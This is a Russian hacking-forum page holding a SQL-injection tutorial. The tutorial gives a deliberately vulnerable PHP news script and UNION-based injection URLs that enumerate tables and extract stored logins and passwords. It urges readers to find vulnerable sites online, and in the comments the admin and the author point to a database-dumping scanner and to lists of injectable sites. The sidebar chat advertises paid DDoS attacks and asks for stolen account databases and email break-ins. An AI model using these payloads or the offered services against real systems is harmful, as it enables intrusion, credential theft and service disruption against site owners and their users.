Для доступа к контенту сайта, пожалуйста отключите Аd-Blосk. При включенном блокираторе сайт может работать не корректно.

Реклама
Новые комментарии
  • TnTj7
    Написал(а): TnTj7
    В новости: Dark Comet 5.3.2
  • AkselRus
    Написал(а): AkselRus
    В новости: DaRK DDoSeR v5.6d
  • MeRs
    Написал(а): MeRs
    В новости: Havij v1.17 Pro [CRACKED]
  • xvampirx666
    Написал(а): xvampirx666
  • Jeffeek
    Написал(а): Jeffeek
  • MrDevil131
    Написал(а): MrDevil131
Доска почёта
Посетители
Счётчики



Анализ сайта
Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • iDroid
    20 фев 2017, 21:39
    @HappyLove, дурак, а исходный код?
    • iVacuumYT
      20 фев 2017, 19:58
      Ну я возможно смогу,но мне легче будет свой хак написать,но не вижу в этом смысла,так как уже есть много читов в СНг
      • HappyLove
        20 фев 2017, 15:09
        Ребят,кто из разработчиков читов для CS:GO сможет переписать чит ,название INDIGO,exe (этот файл у меня есть) , на нем имеется привязка . Если вы сможете изменить меню и название , то сможете в скором времени зарабатывать на нем денежную валюту(рубли , гривни , долары .. не важно )*
        • HappyLove
          20 фев 2017, 15:04
          Ребят,кто из разработчиков читов для CS:GO сможет переписать чит,название INDIGO,exe у меня есть,там привязка,можно переделать меню и название,и продавать как свой,ну просто переписать чит...
          • Shimikami
            17 фев 2017, 18:13
            xd
            • admin
              17 фев 2017, 00:49
              @nullzero, Tell Barack Obama, if he did not stop to pee in our doorways, I'll break his face
              • admin
                17 фев 2017, 00:39
                @nullzero, Think about whether you need it?
                • nullzero
                  16 фев 2017, 23:37
                  Hello!, I want to make special release for happy-hack.ru how can I post it to site ?
                  • iDroid
                    16 фев 2017, 21:24
                    Все форум рип, админу пох*й на все, я е**л
                    • stasgorr
                      16 фев 2017, 17:27
                      кто может слить базу акаунтов стим мне в лс
                      • puzo
                        16 фев 2017, 15:49
                        Desssa, поробуй этот, тут партнерка есть ну и платники так-же volga-star.ru
                        • fox_
                          16 фев 2017, 14:24
                          как получить пароль от сайта, через netsparker
                          • sanay84
                            16 фев 2017, 13:45
                            мне нужна помощь !
                            взломать нужно мыло . вся инфа пользователя ,есть сменил пароль а подобрать не могу .!(( нужно от туда вытащить письмо
                            • MeRs
                              15 фев 2017, 16:14
                              Кто норм базу может на брут стим/оригин акков скинуть?
                              • ZLOY_HACKER
                                14 фев 2017, 23:51
                                <*** class="title_quote">Цитата: savinini***><*** class="quote">@ZLOY_HACKER, но это неточно***> Админ сказал рип
                                • savinini
                                  14 фев 2017, 21:42
                                  @ZLOY_HACKER, но это неточно
                                  • ZLOY_HACKER
                                    14 фев 2017, 16:56
                                    хэпик рип
                                    • Деда
                                      14 фев 2017, 11:54
                                      Привет хэпик :D
                                      • iDroid
                                        12 фев 2017, 19:02
                                        только что положил хппихак)
                                        так вот, кому надо пишите
                                        • iDroid
                                          12 фев 2017, 15:01
                                          провожу DDoS атаки на сайты, 50 рублей час
                                          • morfej
                                            12 фев 2017, 10:03
                                            Есть кто тут из админов
                                            • kaka228
                                              11 фев 2017, 16:46
                                              есть какой нибудь флуд телефона раб?
                                              • HANTOL
                                                11 фев 2017, 13:45
                                                Нужен аккаунт ВК
                                                • freddy777
                                                  10 фев 2017, 14:28
                                                  @Bosik, легко
                                                  • Bosik
                                                    10 фев 2017, 11:56
                                                    как посмотреть свои статьи на форуме?
                                                    • vadzila298
                                                      9 фев 2017, 03:41
                                                      Кто предлагает работу дропом?
                                                      • savinini
                                                        9 фев 2017, 01:54
                                                        @malay2014, только через гаранта
                                                        • malay2014
                                                          8 фев 2017, 19:17
                                                          • GeorgyTheBlack
                                                            8 фев 2017, 18:47
                                                            Нихрена у меня 265 просмотров
                                                            • GeorgyTheBlack
                                                              8 фев 2017, 18:46
                                                              Опрос на сайте
                                                              Как Вы нашли нас?
                                                              Поисковые системы
                                                              Порекомендовали
                                                              По ссылке с других сайтов
                                                              По ссылке с соц. сетей
                                                              Давно тут, по закладке
                                                              Ярлык в архиве с софтом
                                                              Случайно

                                                              Подписки

                                                                Получать новости на email:


                                                                Мы в соц. сетях:

                                                              Реклама

                                                              Последние сообщения с форума

                                                              Название темы Автор Статистика Последнее сообщение
                                                              раздача e-mail

                                                              Тема в разделе: Халява

                                                              admin

                                                              Просмотров: 1688671

                                                              Ответов: 3743

                                                              Автор: valik1499

                                                              Сегодня, 01:01

                                                              7732554 DDOS - лучший ddos сервис!

                                                              Тема в разделе: Работа/Услуги

                                                              7732554

                                                              Просмотров: 530

                                                              Ответов: 7

                                                              Автор: 7732554

                                                              Сегодня, 00:25

                                                              LOGS SHOP | BANK ACC SHOP | BALANCE ON

                                                              Тема в разделе: Купля/Продажа

                                                              lihobiza

                                                              Просмотров: 99

                                                              Ответов: 1

                                                              Автор: freddy777

                                                              Сегодня, 00:13

                                                              SQL-INJECTION
                                                              Автор: Abrazor | Дата: 5-07-2012, 19:15 | Комментариев: 17 | Просмотров: 7811
                                                              Уязвимость SQL-injection
                                                              Введение
                                                              В данной работе на примере исследуется уязвимость типа SQL Injection с использованием СУБД MySQL и PHP скриптов. Соответственно, для понимания происходящего требуются знания языка запросов SQL и языка php. После теоретической части будут приведены примеры кода и будет описано как все это можно проверить у себя на локальной машине с использованием комплекса DENWER под ОС Windows, хотя можно проделать тоже саоме и под другую ОС, например Linux, используя ту же базу данных MySQL. Т.е. для данного эксперимента потребуется:
                                                              Веб-сервер Apache
                                                              PHP, прикрученный к apache
                                                              СУБД MySQL
                                                              Атака типа SQL Injection — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода. Это атака, при которой производится вставка вредоносного кода в строки, передающиеся затем в базу MySQL, для синтаксического анализа и выполнения. Эта уязвимость может дать возможность атакующему выполнить произвольный запрос к базе данных (например, прочитать содержимое любых таблиц, удалить, изменить или добавить данные), получить возможность чтения и/или записи локальных файлов и выполнения произвольных команд на атакуемом сервере.
                                                              Основная форма атаки SQL Injection состоит в прямой вставке кода в пользовательские входные переменные, которые объединяются с командами SQL и выполняются. Менее явная атака внедряет небезопасный код в строки, предназначенные для хранения в таблице или в виде метаданных. Когда впоследствии сохраненные строки объединяются с динамической командой SQL, происходит выполнение небезопасного кода.
                                                              Атака осуществляется посредством преждевременного завершения текстовой строки и присоединения к ней новой команды. Поскольку к вставленной команде перед выполнением могут быть добавлены дополнительные строки, злоумышленник заканчивает внедряемую строку меткой комментария «--». Весь последующий текст во время выполнения не учитывается.
                                                              Пример использования
                                                              В качестве примера, приведу маленький php скриптик. В нем новости выводятся из базы данных и отображаются пользователям. Но есть одна интересная вещь. Достаточно давно в PHP появилась такая штука, как магические кавычки — эффект автоматической замены кавычки на обратный слэш и кавычку при операциях ввода/вывода в PHP. Это сделано как раз для избежания sql injection у начинающих программистов. По умолчанию в конфиге php.ini данная функция включена. Нам же, для упрощения проведения испытаний надо ее выключить:
                                                              magic_quotes_gpc = Off в файле php.ini
                                                              Далее приведен пример скрипта index.php, для которого и возможно провести исследование уязвимости.
                                                              <?php
                                                              //Настройки БД
                                                              $script['mysql_server']='localhost';//Хост
                                                              $script['mysql_login']='root';//Логин
                                                              $script['mysql_password']='';//Пароль
                                                              $script['mysql_db']='test';//Имя БД

                                                              //Сам скрипт
                                                              $body="";
                                                              $body.="<html>
                                                              <head><title>Новости</title></head>
                                                              <body>
                                                              ";

                                                              mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']) or die('Не могу подключиться к серверу');
                                                              mysql_select_db($script['mysql_db']) or die('Не могу подключиться к БД');

                                                              if(!empty($_GET['id']))//Вывод одной новости
                                                              {
                                                                  $body.="<h3>Просмотр новости</h3> \n<br>";
                                                                  $id=$_GET['id'];
                                                                  //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");
                                                                  $zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
                                                                  $result=mysql_query($zapros);
                                                                  echo(Mysql_error());//Вывод ошибки
                                                                  $data=mysql_fetch_row($result);
                                                                  //Вывод результата запроса
                                                                  $body.="Заголовок: <b>".$data['3']."</b>\n";
                                                                  $body.="<hr><pre>".$data['4']."</pre>\n";
                                                                  $body.="<hr>Добавленно ".$data['5']." ".$data['1']." в ".$data['2']."\n<br><br>";
                                                                  $body.="<a href='?'>Назад</a>";
                                                              }
                                                              else //Ну и простое отображение всех новостей(шоб понятней было где скуль)
                                                              {

                                                                  $body.="<h3>Все новости</h3> \n<br>";
                                                                  $zapros="SELECT * FROM news;";
                                                                  $result_z=mysql_query($zapros);
                                                                  $count_str=mysql_num_rows($result_z);
                                                                  for($i=1;$i<=$count_str;$i++)
                                                                  {
                                                                      $result=@mysql_fetch_assoc($result_z);
                                                                      $body.=$i.".<a href='?id=".$i."'>".$result['caption']."<a/><br>\n";
                                                                  }
                                                              }
                                                              $body.="</body></html>";
                                                              echo($body);
                                                              ?>

                                                              Далее приводится дамп базы данных test, из которой выбираются данные в этом скрипте. Тут есть 2 таблицы: users и news, из которых и выбираются данные в запросах.
                                                              CREATE TABLE `news` (
                                                                `id` int(11) NOT NULL DEFAULT '0',
                                                                `date` varchar(8) NOT NULL DEFAULT '',
                                                                `time` varchar(7) NOT NULL DEFAULT '',
                                                                `caption` varchar(50) NOT NULL DEFAULT '',
                                                                `text` text NOT NULL,
                                                                `avtor` varchar(50) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `news` VALUES (1, '01/04/09', '12:30', 'Превед :)', 'Хакнем скриптег! :)\r\nИ побыстрее а то малоли... :P', 'Бубл');
                                                              INSERT INTO `news` VALUES (2, '25/03/09', '11:10', 'БУгага', '=))) :))\r\nТолько за дизайн извиняюсь... както кривовато смотриться...', 'Бубл');

                                                              CREATE TABLE `users` (
                                                                `login` varchar(20) NOT NULL DEFAULT '',
                                                                `password` varchar(20) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');
                                                              INSERT INTO `users` VALUES ('User', '123456');
                                                              INSERT INTO `users` VALUES ('Looser', 'big_password');

                                                              Методы проведения
                                                              Как определить данный баг
                                                              Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки. Начнем с вот такого скрипта
                                                              http://test1.ru/index.php?id=1

                                                              Соответетвенно оригинальный запрос выглядит так:
                                                              SELECT * FROM news WHERE id='1';

                                                              Для наглядности расскоментируем в скрипте index.php строки, тогда вверх втраницы будет отображаться здачение id, передаваемое из адресной строки браузера и сам запрос к базе данных.
                                                              //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");

                                                              Теперь мы допишем кавычку в переменную "id", вот так
                                                              http://test1.ru/index.php?id=1'

                                                              если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:
                                                              mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

                                                              Так как в запросе к БД будет присутствовать лишняя кавычка:
                                                              SELECT * FROM news WHERE id='1'';

                                                              Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так:
                                                              http://test1.ru/index.php?id=1'; -- '

                                                              То есть запрос к БД станет вот таким:
                                                              SELECT * FROM news WHERE id='1'; -- '';

                                                              “--“ это знак начала комментария все после него будет отброшено, после него должен быть обязательно пробел и перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
                                                              http://test1.ru/index.php?id=1

                                                              Как можно из этого извлечь что-то полезное
                                                              Для начала самое полезное это команда UNION. Модифицируем обращение к скрипту
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1 -- '

                                                              Запрос к БД у нас получается вот таким:
                                                              SELECT * FROM news WHERE id='1' UNION SELECT 1 -- '';

                                                              Но есть одно ограничение -- количество столбцов до и после UNION должно быть одинаковым, соответственно его придется подбирать.
                                                              В нашем примере, как видно из дампа базы -- полей 6, соответственно нам подойдет
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1,2,3,4,5,6 -- '

                                                              Результатом вывода такой команды будет то же что и должно выводиться без команды UNION. Но нам интересно увидеть какие-нибудь другие данные из базы, тогда заменим id=1 на id=-1 и продолжим. Причем заменять необязательно на -1, просто нужно выбрать такое значение которое не выбирается из БД, в нашем случае полей 6, так что может подойти любой значение больше 6 или меньше 1.
                                                              Рыщем по таблицам
                                                              Если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5, то можно сделать так:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              Где 42,1 -- 42 - будет названием таблицы, причем нумерация идет с первой БД. Т.е. если есть несколько баз, то будут показываться таблицы из всех имеющихся баз данных -- нумерация сквозная. Естественно эти названия будут показываться в каком-то из полей вывода странички. Точнее они будут показываться в том поле, в которое мы поставили TABLE_NAME, то есть у нас название таблицы будет отображаться в поле номер 4, то есть вместо заголовка новости.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1 -- '';

                                                              Начиная с номера LIMIT 41,1 начинается искомая нами база данных test. Соответственно будут показываться названия таблиц базы данных в поле 4.
                                                              SQL-INJECTION

                                                              Если использовать такой запрос:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              То получим:
                                                              SQL-INJECTION

                                                              Так мы находим название таблицы. Далее находим названия полей и т.д. В результате можно получить какие-нибудь логины и пароли. На последнем этапе, зная названия таблиц и их полей можно сделать такой запрос. Мы попробуем просмотреть пользователей из таблицы users. Также можно было перебирать чтобы узнать названия полей таблицы, но мы сразу принали что это поля называются login и password.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 1,1 -- '


                                                              В результате видим:
                                                              SQL-INJECTION

                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 2,1 -- '

                                                              В результате:
                                                              SQL-INJECTION

                                                              В результате выведутся login и password первого и второго пользователя. Они будут выводиться на тех местах, где должна изначально была выводиться информация из полей 3 и 4.
                                                              И самое интересное, если написать
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 0,1 -- '

                                                              Так мы увидим:
                                                              SQL-INJECTION

                                                              В результате мы можем узнать данные, которые не отображаются на сайте. В данном примере мы посмотрели админский пароль и может продолжать веселье =).
                                                              Ну а проверить свои силы можно поставив у себя на ПК Денвер ну или же искать в инете сайты с уязвимостями er
                                                              Пароль на все архивы "happy-hack.ru" либо "hh"





                                                              Поделись:
                                                              Здесь присутствуют:
                                                              На данный момент новость никто не просматривает.
                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 5 июля 2012 19:52
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              можно взять парсер, NetDevilz SQL scanner и Havij и не заморачивать себе голову

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:18
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Одно дело когда ты знаешь команды и как проводить атаку,а одно дело когда ты тыкнул на кнопку и оно 80%работы сделало тебе....ну вообщем палка двух концов...кому интересно тот почитает er

                                                              --------------------

                                                              Репутация: ( 2 )
                                                            • Offline Пользователь offline

                                                              • Написал: VADIMG
                                                              • Дата: 5 июля 2012 20:21
                                                              • Новостей: 1
                                                              • Комментариев: 19
                                                              +1, тема бестолковая, уже никто не раскручивает руками.

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:23
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              я еще раз говорю кому интересно как оно все происходит тот почитает ce

                                                              --------------------
                                                              Xaker2013 нравится это.
                                                              Copyright ©

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 5 июля 2012 20:32
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              Abrazor,
                                                              Прочитал))И это уже знал))Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт, с Havij такая же проблема ни разу ещё нормально взлом не прошёл.
                                                              P.S троли уепитесь АПстену =) dm

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:35
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Brutforce,
                                                              "некому" "тока" cap
                                                              ну и не удивительно что не интересно cv
                                                              а и забыл добавить,если тебе тема не интересна то не стоит писать в ней свои коменты которые больше похожи на кровавый высер педошкольника ei

                                                              --------------------

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:40
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Max7771,
                                                              ну если хочешь скину в личку пару сайтов на которых на ура проводится скул инжектион? cd

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 6 июля 2012 00:38
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              я хоть и пользуюсь готовыми программами, но всё равно прочитал.

                                                              Репутация: ( 107 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:05
                                                              • Новостей: 382
                                                              • Комментариев: 1379
                                                              Статья заебца,если не копипаст.. notbad

                                                              Репутация: ( 107 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:18
                                                              • Новостей: 382
                                                              • Комментариев: 1379
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 6 июля 2012 16:44
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              admin,
                                                              статейка копипаст okok
                                                              просто я по ней начал обучатся скул инжекту daaaaa

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 7 июля 2012 09:41
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              admin,
                                                              Спасибо попробуем)))

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: kirkajkee
                                                              • Дата: 18 июля 2012 15:19
                                                              • Новостей: 0
                                                              • Комментариев: 11
                                                              admin, писани мне в асю 710554 я нашел пару десятков гудов, буду благодарен если научишь скл инъекции и поделюсь приват инфой))
                                                              ну или еще кто нибудь если хорошо шарит
                                                              так для общего развития хочется)

                                                              Репутация: ( 7 )
                                                            • Offline Пользователь offline

                                                              • Написал: sandra777
                                                              • Дата: 3 августа 2012 19:03
                                                              • Новостей: 15
                                                              • Комментариев: 117
                                                              Статья может быть и интересная, но сил до конца прочитать не хватает.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: googlebot
                                                              • Дата: 4 августа 2012 17:16
                                                              • Новостей: 0
                                                              • Комментариев: 8
                                                              спасибо

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Denemut
                                                              • Дата: 3 января 2013 03:28
                                                              • Новостей: 0
                                                              • Комментариев: 50
                                                              Пока в закладки, как время будет прочитаю чего там интересного есть :)

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: SlendeR
                                                              • Дата: 20 декабря 2013 22:20
                                                              • Новостей: 0
                                                              • Комментариев: 26
                                                              Цитата: admin
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Чувак чувак чувак!!! Ты просто бог! Черт, я видос глядел, где эту софтину используют, а найти не мог! И тут искал, и везде как шнырь лазил... А попал сюда, почитал коммент, перешел по ссылке, и нашел! Черт, спасибо тебе что хуеву-тучу дней назад, ты написал этот коммент!!
                                                              Информация
                                                              Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.